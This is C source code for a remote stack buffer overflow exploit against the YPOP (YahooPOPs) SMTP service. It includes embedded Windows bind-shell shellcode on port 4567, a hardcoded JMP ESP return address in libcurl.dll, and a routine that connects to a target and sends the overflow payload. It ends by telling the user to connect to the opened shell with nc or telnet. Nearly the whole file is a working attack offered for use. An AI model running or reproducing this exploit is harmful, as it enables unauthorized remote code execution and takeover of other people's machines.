/*-= ---------------------------------- =-
 * = YPOP SMTP Remote Buffer Overflow   =
 * = BindShell Exploit by cyrex         =
 * = Tested on Win2k SP4         =
 *-= ---------------------------------- =-
 * = Info:           =
 * = If you need more offsets you need  =
 * = to get the JMP Address of         =
 * = libcurl.dll and the return address =
 * = of it. Try your luck.  =
 *-= ---------------------------------- =-
 * = Usage:    =
 * = ./ypop -h <hostname -p <port> =
 *-= ---------------------------------- =-
 ***********
 The Bug is to send a request with more than 504 bytes that will overwrite ESP and cause a stack based overflow. 
 Example:
 Telnet localhost 25 
 220 YahooPOPs! Simple Mail Transfer Service Ready 
 504xA CODE

 The EIP register will be overwritten and our code will be executed 
 here is a little exploit
 ************

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <netdb.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

// ;W32 BindShellcode by cyrex
// ;Listen on port 4567
// ;uses exit thread

unsigned char shellcode[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\xd7\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00"
"\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";

// Tested on Win2k SP4

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll 
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3"; 

int fd,bytes;

int sendtotarget(char *str) { 
 int extern fd;
 int d; char nc[2048];
 sprintf(nc,"%s\r\n",str);
 d=send(fd,nc,strlen(nc),0);
 if (!d) { printf("[-] Cannot send Data\n"); }
 return(0);
}

void usage(char *prog) 
{
 printf("Usage: %s <parm>\n",prog);
 printf("------\n");
 printf(" -h <hostname> e.g (-h 127.0.0.1)\n");
 printf(" -p <port>     e.g (-p 25\n");
}

int main(int argc, char *argv[]) 
{
 int arg,port,stack,i;
 char evilbuf[1024];
 char *hostname;
 char buffer[300];
 struct hostent *he;
 struct sockaddr_in client;

 printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");
 printf("   BindShell Exploit by cyrex\n");
 printf("- - - - - - - - - - - - - - - - - - - - - \n");

 if(argc<4) {
  usage(argv[0]);
  exit(-1);
 }
   
 
 while((arg=getopt(argc, argv, "h:p:t:")) != EOF) {
  switch(arg) {
   case 'h':
    hostname=optarg;
    break;
   case 'p':
    port=atoi(optarg);
    break;
   default:
    usage(argv[0]);
    break;
  }
 }

 if((he=gethostbyname(hostname))==NULL)
 {
  printf("[-] Error Resolving Hostname.. Failed\n");
  exit(-1);
 }

 printf("[+] Connecting to %s on port %i\n",hostname,port);

 if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){
  printf("[-] Socket Creation Failed.\n");
  exit(-1);
 }
 client.sin_family = AF_INET;
 client.sin_port = htons(port);
 client.sin_addr = *((struct in_addr *)he->h_addr);

 if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) {
  printf("[-] Can't Connect to %s\n",hostname);
  exit(-1);
 }

 printf("[+] Connected!\n");

 if((bytes=recv(fd,buffer,300,0)) == NULL)
 {
  printf("[-] Error Receiving Welcome\n");
  exit(-1);
 }
 buffer[bytes]='\0';
 if((strstr(buffer,"220")==NULL) || (strstr(buffer,"SMTP")==NULL)) {
  printf("[-] Hmm.. you sure this is a SMTP Server?\n");
  exit(-1);
 }

 stack=504-sizeof(shellcode); 
 memset(evilbuf,0,sizeof(evilbuf));
 for(i=0;i<stack;i++) {
  strcat(evilbuf,"\x90");
 }
 strcat(evilbuf,shellcode);
 strcat(evilbuf,ret_code);
 strcat(evilbuf,jump_back);
 strcat(evilbuf,"\n");

 printf("[+] Sending Evil Shellcode\n");

 if(send(fd,evilbuf,strlen(evilbuf),0)==NULL)
 {
  printf("[-] Error sending Shellcode\n");
  exit(-1);
 }
 
 printf("[+] Done. Now do:\n");
 printf(" -> nc %s %i or\n",hostname,port);
 printf(" -> telnet %s %i\n",hostname,port);
  
}